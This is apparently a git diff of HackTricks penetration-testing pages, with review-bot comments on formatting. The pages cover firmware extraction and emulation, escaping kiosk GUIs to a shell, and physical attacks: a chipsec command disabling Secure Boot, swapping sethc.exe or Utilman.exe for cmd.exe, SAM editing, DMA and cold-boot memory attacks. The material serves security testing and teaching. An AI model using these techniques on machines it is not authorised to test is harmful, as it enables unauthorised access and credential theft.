@@ -61,7 +61,7 @@ The way web technologies handle duplicate HTTP parameters varies, affecting thei - **Flask:** Adopts the first parameter value encountered, such as `a=1` in a query string `a=1&a=2`, prioritizing the initial instance over subsequent duplicates. - **PHP (on Apache HTTP Server):** Contrarily, prioritizes the last parameter value, opting for `a=2` in the given example. This behavior can inadvertently facilitate HPP exploits by honoring the attacker's manipulated parameter over the original. -# References +## References * [https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654](https://medium.com/@shahjerry33/http-parameter-pollution-its-contaminated-85edc0805654) * [https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution](https://github.com/google/google-ctf/tree/master/2023/web-under-construction/solution) diff --git a/pentesting-web/regular-expression-denial-of-service-redos.md b/pentesting-web/regular-expression-denial-of-service-redos.md index c20c4f4c1..bd62636f2 100644 --- a/pentesting-web/regular-expression-denial-of-service-redos.md +++ b/pentesting-web/regular-expression-denial-of-service-redos.md 
@@ -86,7 +86,7 @@ Regexp (a+)*$ took 723 milliseconds. * [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit) * [https://devina.io/redos-checker](https://devina.io/redos-checker) -# References +## References * [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) * [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) * [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md index 6bbe8258e..7a520b1a0 100644 --- a/pentesting-web/reset-password.md +++ b/pentesting-web/reset-password.md @@ -118,7 +118,7 @@ Stay informed with the newest bug bounties launching and crucial platform update * **Mitigation Steps**: - Set a reasonable expiration time for reset tokens and strictly enforce it server-side. -# References +## References * [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
diff --git a/physical-attacks/escaping-from-gui-applications/README.md b/physical-attacks/escaping-from-gui-applications/README.md index 13b9e0e96..50a264ef2 100644 --- a/physical-attacks/escaping-from-gui-applications/README.md +++ b/physical-attacks/escaping-from-gui-applications/README.md @@ -35,7 +35,7 @@ You should check if you can: ## Command Execution -Maybe **using a **_**Open with**_** option** you can open/execute some kind of shell. +Maybe **using a `Open with`** option** you can open/execute some kind of shell. ### Windows @@ -152,6 +152,10 @@ Type this URLs to obtain an Explorer view: * `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> My Network Places * `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer +## Show File Extensions + +Check this page for more information: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml) + # Browsers tricks Backup iKat versions: 
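Review bot: the "Command Execution" hunk introduces unbalanced emphasis: `Maybe **using a \`Open with\`** option** you can` opens one bold span and closes two, leaving a stray `**` that will render literally and may swallow the rest of the paragraph in some renderers. Suggest `Maybe using an \`Open with\` option you can open/execute some kind of shell.` (also "an", not "a", before `Open`). The new "Show File Extensions" section is only an external link; a one-line statement of why it matters here (hidden extensions disguise executables in the kiosk's file dialogs) would make it self-contained.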
@@ -166,49 +170,27 @@ Source: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811 ## Gestures and bottoms -### Swipe up with four (or five) fingers / Double-tap Home button +* Swipe up with four (or five) fingers / Double-tap Home button: To view the multitask view and change App -To view the multitask view and change App +* Swipe one way or another with four or five fingers: In order to change to the next/last App -### Swipe one way or another with four or five fingers +* Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up: To access Home + +* Swipe one finger from the bottom of the screen just 1-2 inches (slow): The dock will appear -In order to change to the next/last App +* Swipe down from the top of the display with 1 finger: To view your notifications -### Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up +* Swipe down with 1 finger the top-right corner of the screen: To see iPad Pro's control centre -To access Home +* Swipe 1 finger from the left of the screen 1-2 inches: To see Today view -### Swipe one finger from the bottom of the screen just 1-2 inches (slow) +* Swipe fast 1 finger from the centre of the screen to the right or left: To change to next/last App -The dock will appear +* Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right: To power off -### Swipe down from the top of the display with 1 finger +* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**: To force a hard power off -To view your notifications - -### Swipe down with 1 finger the top-right corner of the screen - -To see iPad Pro's control centre - -### Swipe 1 finger from the left of the screen 1-2 inches - -To see Today view - -### 
Swipe fast 1 finger from the centre of the screen to the right or left - -To change to next/last App - -### Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +** Move the Slide to **power off** slider all the way to the right, - -To power off - -### Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second** - -To force a hard power off - -### Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly** - -To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed. +* Press the On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**: To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed. ## Shortcuts @@ -299,7 +281,7 @@ These shortcuts are for the visual settings and sound settings, depending on the | ⌘. | Stop loading the current tab | | ⌘⌥F (Command-Option/Alt-F) | Search in your mailbox | -## References +# References * [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html) * [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html) diff --git a/physical-attacks/firmware-analysis/README.md b/physical-attacks/firmware-analysis/README.md index cd21582af..584a3cdb4 100644 --- a/physical-attacks/firmware-analysis/README.md +++ b/physical-attacks/firmware-analysis/README.md 
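Review bot: this file's References heading goes the opposite way from the rest of the commit: here `## References` becomes `# References`, while parameter-pollution.md, regular-expression-denial-of-service-redos.md and reset-password.md all change `# References` to `## References`. Pick one convention for the commit; given that this file still uses `# Browsers tricks` as a section heading, the H1 may be locally consistent, but then the other three hunks should be dropped or the whole file re-levelled. While the gestures hunk is being restructured into bullets, the context heading "## Gestures and bottoms" should read "buttons", and the bold in `**iPad +** Move the Slide to **power off** slider` is carried over unchanged and still reads as a markup error.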
@@ -14,54 +14,40 @@ Other ways to support HackTricks: -## Introduction +## **Introduction** -Firmware is a type of software that provides communication and control over a device’s hardware components. It’s the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware. +Firmware is essential software that enables devices to operate correctly by managing and facilitating communication between the hardware components and the software that users interact with. It's stored in permanent memory, ensuring the device can access vital instructions from the moment it's powered on, leading to the operating system's launch. Examining and potentially modifying firmware is a critical step in identifying security vulnerabilities. -Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash memory. +## **Gathering Information** -It’s important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process. +**Gathering information** is a critical initial step in understanding a device's makeup and the technologies it uses. This process involves collecting data on: -## **Information gathering and reconnaissance** +- The CPU architecture and operating system it runs +- Bootloader specifics +- Hardware layout and datasheets +- Codebase metrics and source locations +- External libraries and license types +- Update histories and regulatory certifications +- Architectural and flow diagrams +- Security assessments and identified vulnerabilities -During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. 
Attempt to gather the following: +For this purpose, **open-source intelligence (OSINT)** tools are invaluable, as is the analysis of any available open-source software components through manual and automated review processes. Tools like [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore) offer free static analysis that can be leveraged to find potential issues. -* Supported CPU architecture(s) -* Operating system platform -* Bootloader configurations -* Hardware schematics -* Datasheets -* Lines-of-code (LoC) estimates -* Source code repository location -* Third-party components -* Open source licenses (e.g. GPL) -* Changelogs -* FCC IDs -* Design and data flow diagrams -* Threat models -* Previous penetration testing reports -* Bug tracking tickets (e.g. Jira and bug bounty platforms such as BugCrowd or HackerOne) +## **Acquiring the Firmware** -Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore). 
+Obtaining firmware can be approached through various means, each with its own level of complexity: -## Getting the Firmware - -There are different ways with different difficulty levels to download the firmware - -* **Directly** from the development team, manufacturer/vendor or client -* **Build from scratch** using walkthroughs provided by the manufacturer -* From the **vendor's support site** -* **Google dork** queries targeted towards binary file extensions and file sharing platforms such as Dropbox, Box, and Google drive - * It’s common to come across firmware images through customers who upload contents to forums, blogs, or comment on sites where they contacted the manufacturer to troubleshoot an issue and were given firmware via a zip or flash drive sent. - * Example: `intitle:"Netgear" intext:"Firmware Download"` -* Download builds from exposed cloud provider storage locations such as Amazon Web Services (AWS) S3 buckets (with tools such as [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner)) -* **Man-in-the-middle** (MITM) device communication during **updates** -* Extract directly **from hardware** via **UART**, **JTAG**, **PICit**, etc. -* Sniff **serial communication** within hardware components for **update server requests** -* Via a **hardcoded endpoint** within the mobile or thick applications -* **Dumping** firmware from the **bootloader** (e.g. U-boot) to flash storage or over the **network** via **tftp** -* Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT). - * You will need a supported chip programmer for flash storage and/or the MCU. 
+- **Directly** from the source (developers, manufacturers) +- **Building** it from provided instructions +- **Downloading** from official support sites +- Utilizing **Google dork** queries for finding hosted firmware files +- Accessing **cloud storage** directly, with tools like [S3Scanner](https://github.com/sa7mon/S3Scanner) +- Intercepting **updates** via man-in-the-middle techniques +- **Extracting** from the device through connections like **UART**, **JTAG**, or **PICit** +- **Sniffing** for update requests within device communication +- Identifying and using **hardcoded update endpoints** +- **Dumping** from the bootloader or network +- **Removing and reading** the storage chip, when all else fails, using appropriate hardware tools ## Analyzing the firmware 
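Review bot: the rewritten Introduction replaces the concrete "nonvolatile memory, such as ROM, EPROM, or flash memory" with "permanent memory", which is vaguer and technically looser (flash is non-volatile, but it is rewritten on every update, so "permanent" is misleading); suggest keeping the original wording, e.g. "It's stored in non-volatile memory (ROM, EPROM or flash), so the device can read it from the moment it is powered on". The same hunk silently drops several checklist items from the information-gathering list (FCC IDs, threat models, previous penetration testing reports, bug tracking tickets and bug bounty platforms) and the one example Google dork, `intitle:"Netgear" intext:"Firmware Download"`, that made the "Google dork" bullet actionable; if the intent is only to shorten the list, a one-line example per bullet is worth keeping. Two smaller points: "PICit" in the extraction bullet (present before and after the change) looks like a typo for "PICkit", and the bold markup inside `## **Introduction**`, `## **Gathering Information**` and `## **Acquiring the Firmware**` is redundant in a Markdown heading.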
@@ -143,176 +129,109 @@ Files will be in "`squashfs-root`" directory afterwards. `$ ubidump.py ` -### Analyzing the Filesystem -Now that you have the filesystem is time to start looking for bad practices such as: +## Analyzing Firmware -* Legacy **insecure network daemons** such as telnetd (sometimes manufactures rename binaries to disguise ) -* **Hardcoded credentials** (usernames, passwords, API keys, SSH keys, and backdoor variants ) -* **Hardcoded API** endpoints and backend server details -* **Update server functionality** that could be used as an entry point -* **Review uncompiled code and start up scripts** for remote code execution -* **Extract compiled binaries** to be used for offline analysis with a disassembler for future steps +Once the firmware is obtained, it's essential to dissect it for understanding its structure and potential vulnerabilities. This process involves utilizing various tools to analyze and extract valuable data from the firmware image. -Some **interesting things to look** for inside the firmware: +### Initial Analysis Tools -* etc/shadow and etc/passwd -* list out the etc/ssl directory -* search for SSL related files such as .pem, .crt, etc. -* search for configuration files -* look for script files -* search for other .bin files -* look for keywords such as admin, password, remote, AWS keys, etc. -* search for common web servers used on IoT devices -* search for common binaries such as ssh, tftp, dropbear, etc. -* search for banned c functions -* search for common command injection vulnerable functions -* search for URLs, email addresses and IP addresses -* and more… +A set of commands is provided for initial inspection of the binary file (referred to as ``). 
These commands help in identifying file types, extracting strings, analyzing binary data, and understanding the partition and filesystem details: -Tools that search for this kind of information (even if you always should take a manual look and get comfortable with the filesystem structure, the tools can help you finding **hidden things**): +```bash +file +strings -n8 +strings -tx #prints offsets in hexadecimal +hexdump -C -n 512 > hexdump.out +hexdump -C | head #useful for finding signatures in the header +fdisk -lu #lists partitions and filesystems, if there are multiple +``` -* [**LinPEAS**](https://github.com/carlospolop/PEASS-ng)**:** Awesome bash script that in this case is useful for searching **sensitive information** inside the filesystem. Just **chroot inside the firmware filesystem and run it**. -* [**Firmwalker**](https://github.com/craigz28/firmwalker)**:** Bash script to search for potential sensitive information -* [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core): - * Identification of software components such as operating system, CPU architecture, and third-party components along with their associated version information - * Extraction of firmware filesystem (s ) from images - * Detection of certificates and private keys - * Detection of weak implementations mapping to Common Weakness Enumeration (CWE) - * Feed & signature-based detection of vulnerabilities - * Basic static behavioral analysis - * Comparison (diff) of firmware versions and files - * User mode emulation of filesystem binaries using QEMU - * Detection of binary mitigations such as NX, DEP, ASLR, stack canaries, RELRO, and FORTIFY\_SOURCE - * REST API - * and more... -* [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer): FwAnalyzer is a tool to analyze (ext2/3/4), FAT/VFat, SquashFS, UBIFS filesystem images, cpio archives, and directory content using a set of configurable rules. 
-* [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep): A Free Software IoT Firmware Security Analysis Tool -* [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go): This is a complete rewrite of the original ByteSweep project in Go. -* [**EMBA**](https://github.com/e-m-b-a/emba): _EMBA_ is designed as the central firmware analysis tool for penetration testers. It supports the complete security analysis process starting with the _firmware extraction_ process, doing _static analysis_ and _dynamic analysis_ via emulation and finally generating a report. _EMBA_ automatically discovers possible weak spots and vulnerabilities in firmware. Examples are insecure binaries, old and outdated software components, potentially vulnerable scripts or hard-coded passwords. +To assess the encryption status of the image, the **entropy** is checked with `binwalk -E `. Low entropy suggests a lack of encryption, while high entropy indicates possible encryption or compression. -{% hint style="warning" %} -Inside the filesystem you can also find **source code** of programs (that you should always **check**), but also **compiled binaries**. These programs might be somehow exposed and you should **decompile** and **check** them for potential vulnerabilities. +For extracting **embedded files**, tools and resources like the **file-data-carving-recovery-tools** documentation and **binvis.io** for file inspection are recommended. -Tools like [**checksec.sh**](https://github.com/slimm609/checksec.sh) can be useful to find unprotected binaries. For Windows binaries you could use [**PESecurity**](https://github.com/NetSPI/PESecurity). -{% endhint %} +### Extracting the Filesystem -## Emulating Firmware +Using `binwalk -ev `, one can usually extract the filesystem, often into a directory named after the filesystem type (e.g., squashfs, ubifs). However, when **binwalk** fails to recognize the filesystem type due to missing magic bytes, manual extraction is necessary. 
This involves using `binwalk` to locate the filesystem's offset, followed by the `dd` command to carve out the filesystem: -The idea to emulate the Firmware is to be able to perform a **dynamic analysis** of the device **running** or of a **single program**. +```bash +$ binwalk DIR850L_REVB.bin -{% hint style="info" %} -At times, partial or full emulation **may not work due to a hardware or architecture dependencies**. If the architecture and endianness match a device owned such as a raspberry pie, the root filesystem or specific binary can be transferred to the device for further testing. This method also applies to pre built virtual machines using the same architecture and endianness as the target. -{% endhint %} +$ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs +``` -### Binary Emulation +Afterwards, depending on the filesystem type (e.g., squashfs, cpio, jffs2, ubifs), different commands are used to manually extract the contents. -If you just want to emulate one program to search for vulnerabilities, you first need to identify its endianness and the CPU architecture for which it was compiled. +### Filesystem Analysis -#### MIPS example +With the filesystem extracted, the search for security flaws begins. Attention is paid to insecure network daemons, hardcoded credentials, API endpoints, update server functionalities, uncompiled code, startup scripts, and compiled binaries for offline analysis. 
+ +**Key locations** and **items** to inspect include: + +- **etc/shadow** and **etc/passwd** for user credentials +- SSL certificates and keys in **etc/ssl** +- Configuration and script files for potential vulnerabilities +- Embedded binaries for further analysis +- Common IoT device web servers and binaries + +Several tools assist in uncovering sensitive information and vulnerabilities within the filesystem: + +- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) and [**Firmwalker**](https://github.com/craigz28/firmwalker) for sensitive information search +- [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT\_core) for comprehensive firmware analysis +- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer), [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep), [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go), and [**EMBA**](https://github.com/e-m-b-a/emba) for static and dynamic analysis + +### Security Checks on Compiled Binaries + +Both source code and compiled binaries found in the filesystem must be scrutinized for vulnerabilities. Tools like **checksec.sh** for Unix binaries and **PESecurity** for Windows binaries help identify unprotected binaries that could be exploited. + +## Emulating Firmware for Dynamic Analysis + +The process of emulating firmware enables **dynamic analysis** either of a device's operation or an individual program. This approach can encounter challenges with hardware or architecture dependencies, but transferring the root filesystem or specific binaries to a device with matching architecture and endianness, such as a Raspberry Pi, or to a pre-built virtual machine, can facilitate further testing. + +### Emulating Individual Binaries + +For examining single programs, identifying the program's endianness and CPU architecture is crucial. 
+ +#### Example with MIPS Architecture + +To emulate a MIPS architecture binary, one can use the command: ```bash file ./squashfs-root/bin/busybox -./squashfs-root/bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped ``` -Now you can **emulate** the busybox executable using **QEMU**. +And to install the necessary emulation tools: ```bash - sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils +sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils ``` -Because the executable **is** compiled for **MIPS** and follow the **big-endian** byte ordering, we’ll use QEMU’s **`qemu-mips`** emulator. To emulate **little-endian** executables, we would have to select the emulator with the `el` suffix(`qemu-mipsel`): +For MIPS (big-endian), `qemu-mips` is used, and for little-endian binaries, `qemu-mipsel` would be the choice. -```bash -qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/ls -100 100.7z 15A6D2.squashfs squashfs-root squashfs-root-0 -``` +#### ARM Architecture Emulation -#### ARM Example - -```bash -file bin/busybox -bin/busybox: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-armhf.so.1, no section header -``` - -Emulation: - -```bash -qemu-arm -L ./squashfs-root/ ./squashfs-root/bin/ls -1C00000.squashfs B80B6C C41DD6.xz squashfs-root squashfs-root-0 -``` +For ARM binaries, the process is similar, with the `qemu-arm` emulator being utilized for emulation. 
### Full System Emulation -There are several tools, based in **qemu** in general, that will allow you to emulate the complete firmware: +Tools like [Firmadyne](https://github.com/firmadyne/firmadyne), [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit), and others, facilitate full firmware emulation, automating the process and aiding in dynamic analysis. -* [**https://github.com/firmadyne/firmadyne**](https://github.com/firmadyne/firmadyne)**:** - * You need to install several things, configure postgres, then run the extractor.py script to extract the firmware, use the getArch.sh script to get the architecture. Then, use tar2db.py and makeImage.sh scripts to store information from the extracted image in the database and generate a QEMU image that we can emulate. The, use inferNetwork.sh script to get the network interfaces, and finally use the run.sh script, which is automatically created in the ./scratch/1/folder. -* [**https://github.com/attify/firmware-analysis-toolkit**](https://github.com/attify/firmware-analysis-toolkit)**:** - * This tool depends on firmadyne and automates the process of emulating the firmware using firmadynee. you need to configure `fat.config` before using it: `sudo python3 ./fat.py IoTGoat-rpi-2.img --qemu 2.5.0` -* [**https://github.com/therealsaumil/emux**](https://github.com/therealsaumil/emux) -* [**https://github.com/getCUJO/MIPS-X**](https://github.com/getCUJO/MIPS-X) -* [**https://github.com/qilingframework/qiling#qltool**](https://github.com/qilingframework/qiling#qltool) +## Dynamic Analysis in Practice -## **Dynamic analysis** +At this stage, either a real or emulated device environment is used for analysis. It's essential to maintain shell access to the OS and filesystem. Emulation may not perfectly mimic hardware interactions, necessitating occasional emulation restarts. Analysis should revisit the filesystem, exploit exposed webpages and network services, and explore bootloader vulnerabilities. 
Firmware integrity tests are critical to identify potential backdoor vulnerabilities. -In this stage you should have either a device running the firmware to attack or the firmware being emulated to attack. In any case, it's highly recommended that you also have **a shell in the OS and filesystem that is running**. +## Runtime Analysis Techniques -Note that some times if you are emulating the firmware **some activities inside the emulation will fail** and you might need to restart emulating it. For example, a web application might need to get information from a device the original device is integrated with but the emulation is not emulating. +Runtime analysis involves interacting with a process or binary in its operating environment, using tools like gdb-multiarch, Frida, and Ghidra for setting breakpoints and identifying vulnerabilities through fuzzing and other techniques. -You should **recheck the filesystem** as we already did in a **previous step as in the running env new information might be accessible.** +## Binary Exploitation and Proof-of-Concept -If **webpages** are exposed, reading the code and having access to them you should **test them**. In hacktricks you can find a lot of information about different web hacking techniques. +Developing a PoC for identified vulnerabilities requires a deep understanding of the target architecture and programming in lower-level languages. Binary runtime protections in embedded systems are rare, but when present, techniques like Return Oriented Programming (ROP) may be necessary. -If **network services** are exposed you should try to attack them. In hacktricks you can find a lot of information about different network services hacking techniques. You could also try to fuzz them with network and protocol **fuzzers** such as [Mutiny](https://github.com/Cisco-Talos/mutiny-fuzzer), [boofuzz](https://github.com/jtpereyda/boofuzz), and [kitty](https://github.com/cisco-sas/kitty). 
+## Prepared Operating Systems for Firmware Analysis -You should check if you can **attack the bootloader** to get a root shell: - -{% content-ref url="bootloader-testing.md" %} -[bootloader-testing.md](bootloader-testing.md) -{% endcontent-ref %} - -You should test if the device is doing any kind of **firmware integrity tests**, if not this would allow attackers to offer backdored firmwares, install them in devices other people owns or even deploy them remotely if there is any firmware update vulnerability: - -{% content-ref url="firmware-integrity.md" %} -[firmware-integrity.md](firmware-integrity.md) -{% endcontent-ref %} - -Firmware update vulnerabilities usually occurs because, the **integrity** of the **firmware** might **not** be **validated**, use **unencrypted** **network** protocols, use of **hardcoded** **credentials**, an **insecure authentication** to the cloud component that hosts the firmware, and even excessive and insecure **logging** (sensitive data), allow **physical updates** without verifications. - -## **Runtime analysis** - -Runtime analysis involves attaching to a running process or binary while a device is running in its normal or emulated environment. Basic runtime analysis steps are provided below: - -1. `sudo chroot . ./qemu-arch -L -g ` -2. Attach gdb-multiarch or use IDA to emulate the binary -3. Set breakpoints for functions identified during step 4 such as memcpy, strncpy, strcmp, etc. -4. Execute large payload strings to identify overflows or process crashes using a fuzzer -5. Move to step 8 if a vulnerability is identified - -Tools that may be helpful are (non-exhaustive): - -* gdb-multiarch -* [Peda](https://github.com/longld/peda) -* Frida -* ptrace -* strace -* IDA Pro -* Ghidra -* Binary Ninja -* Hopper - -## **Binary Exploitation** - -After identifying a vulnerability within a binary from previous steps, a proper proof-of-concept (PoC) is required to demonstrate the real-world impact and risk. 
Developing exploit code requires programming experience in lower level languages (e.g. ASM, C/C++, shellcode, etc.) as well as background within the particular target architecture (e.g. MIPS, ARM, x86 etc.). PoC code involves obtaining arbitrary execution on a device or application by controlling an instruction in memory. - -It is not common for binary runtime protections (e.g. NX, DEP, ASLR, etc.) to be in place within embedded systems however when this happens, additional techniques may be required such as return oriented programming (ROP). ROP allows an attacker to implement arbitrary malicious functionality by chaining existing code in the target process/binary's code known as gadgets. Steps will need to be taken to exploit an identified vulnerability such as a buffer overflow by forming a ROP chain. A tool that can be useful for situations like these is Capstone's gadget finder or ROPGadget- [https://github.com/JonathanSalwan/ROPgadget](https://github.com/JonathanSalwan/ROPgadget). - -Utilize the following references for further guidance: - -* [https://azeria-labs.com/writing-arm-shellcode/](https://azeria-labs.com/writing-arm-shellcode/) -* [https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/) +Operating systems like [AttifyOS](https://github.com/adi0x90/attifyos) and [EmbedOS](https://github.com/scriptingxss/EmbedOS) provide pre-configured environments for firmware security testing, equipped with necessary tools. ## Prepared OSs to analyze Firmware diff --git a/physical-attacks/firmware-analysis/firmware-integrity.md b/physical-attacks/firmware-analysis/firmware-integrity.md index 485e1118d..7de4a429f 100644 --- a/physical-attacks/firmware-analysis/firmware-integrity.md +++ b/physical-attacks/firmware-analysis/firmware-integrity.md 
@@ -14,7 +14,7 @@ Other ways to support HackTricks: -# Firmware Integrity +## Firmware Integrity The **custom firmware and/or compiled binaries can be uploaded to exploit integrity or signature verification flaws**. The following steps can be followed for backdoor bind shell compilation: diff --git a/physical-attacks/physical-attacks.md b/physical-attacks/physical-attacks.md index b2c199dde..6abf1261e 100644 --- a/physical-attacks/physical-attacks.md +++ b/physical-attacks/physical-attacks.md 
@@ -14,136 +14,57 @@ Other ways to support HackTricks: -## BIOS password +## BIOS Password Recovery and System Security -### The battery +**Resetting the BIOS** can be achieved in several ways. Most motherboards include a **battery** that, when removed for around **30 minutes**, will reset the BIOS settings, including the password. Alternatively, a **jumper on the motherboard** can be adjusted to reset these settings by connecting specific pins. -Most of the **motherbords** have a **battery**. If you **remove** it **30min** the settings of the BIOS will be **restarted** (password included). +For situations where hardware adjustments are not possible or practical, **software tools** offer a solution. Running a system from a **Live CD/USB** with distributions like **Kali Linux** provides access to tools like **_killCmos_** and **_CmosPWD_**, which can assist in BIOS password recovery. -### Jumper CMOS +In cases where the BIOS password is unknown, entering it incorrectly **three times** will typically result in an error code. This code can be used on websites like [https://bios-pw.org](https://bios-pw.org) to potentially retrieve a usable password. -Most of the **motherboards** have a **jumper** that can restart the settings. This jumper connects a central pin with another, if you **connect thoses pins the motherbord will be reseted**. +### UEFI Security -### Live Tools +For modern systems using **UEFI** instead of traditional BIOS, the tool **chipsec** can be utilized to analyze and modify UEFI settings, including the disabling of **Secure Boot**. This can be accomplished with the following command: -If you could **run** for example a **Kali** Linux from a Live CD/USB you could use tools like _**killCmos**_ or _**CmosPWD**_ (this last one is included in Kali) you could try to **recover the password of the BIOS**. 
+`python chipsec_main.py -module exploits.secure.boot.pk` -### Online BIOS password recovery +### RAM Analysis and Cold Boot Attacks -Put the password of the BIOS **3 times wrong**, then the BIOS will **show an error messag**e and it will be blocked.\ -Visit the page [https://bios-pw.org](https://bios-pw.org) and **introduce the error code** shown by the BIOS and you could be lucky and get a **valid password** (the **same search could show you different passwords and more than 1 could be valid**). +RAM retains data briefly after power is cut, usually for **1 to 2 minutes**. This persistence can be extended to **10 minutes** by applying cold substances, such as liquid nitrogen. During this extended period, a **memory dump** can be created using tools like **dd.exe** and **volatility** for analysis. -## UEFI +### Direct Memory Access (DMA) Attacks -To check the settings of the UEFI and perform some kind of attack you should try [chipsec](https://github.com/chipsec/chipsec/blob/master/chipsec-manual.pdf).\ -Using this tool you could easily disable the Secure Boot: +**INCEPTION** is a tool designed for **physical memory manipulation** through DMA, compatible with interfaces like **FireWire** and **Thunderbolt**. It allows for bypassing login procedures by patching memory to accept any password. However, it's ineffective against **Windows 10** systems. -``` -python chipsec_main.py -module exploits.secure.boot.pk -``` +### Live CD/USB for System Access -## RAM +Changing system binaries like **_sethc.exe_** or **_Utilman.exe_** with a copy of **_cmd.exe_** can provide a command prompt with system privileges. Tools such as **chntpw** can be used to edit the **SAM** file of a Windows installation, allowing password changes. -### Cold boot +**Kon-Boot** is a tool that facilitates logging into Windows systems without knowing the password by temporarily modifying the Windows kernel or UEFI. 
More information can be found at [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/). -The **RAM memory is persistent from 1 to 2 minutes** from the time the computer is powered off. If you apply **cold** (liquid nitrogen, for example) on the memory card you can extend this time up to **10 minutes**. +### Handling Windows Security Features -Then, you can do a **memory dump** (using tools like dd.exe, mdd.exe, Memoryze, win32dd.exe or DumpIt) to analyze the memory. +#### Boot and Recovery Shortcuts -You should **analyze** the memory **using volatility**. +- **Supr**: Access BIOS settings. +- **F8**: Enter Recovery mode. +- Pressing **Shift** after the Windows banner can bypass autologon. -### [INCEPTION](https://github.com/carmaa/inception) +#### BAD USB Devices -Inception is a **physical memory manipulation** and hacking tool exploiting PCI-based DMA. The tool can attack over **FireWire**, **Thunderbolt**, **ExpressCard**, PC Card and any other PCI/PCIe HW interfaces.\ -**Connect** your computer to the victim computer over one of those **interfaces** and **INCEPTION** will try to **patch** the **physical memory** to give you **access**. +Devices like **Rubber Ducky** and **Teensyduino** serve as platforms for creating **bad USB** devices, capable of executing predefined payloads when connected to a target computer. -**If INCEPTION succeeds, any password introduced will be valid.** +#### Volume Shadow Copy -**It doesn't work with Windows10.** +Administrator privileges allow for the creation of copies of sensitive files, including the **SAM** file, through PowerShell. -## Live CD/USB +### Bypassing BitLocker Encryption -### Sticky Keys and more +BitLocker encryption can potentially be bypassed if the **recovery password** is found within a memory dump file (**MEMORY.DMP**). 
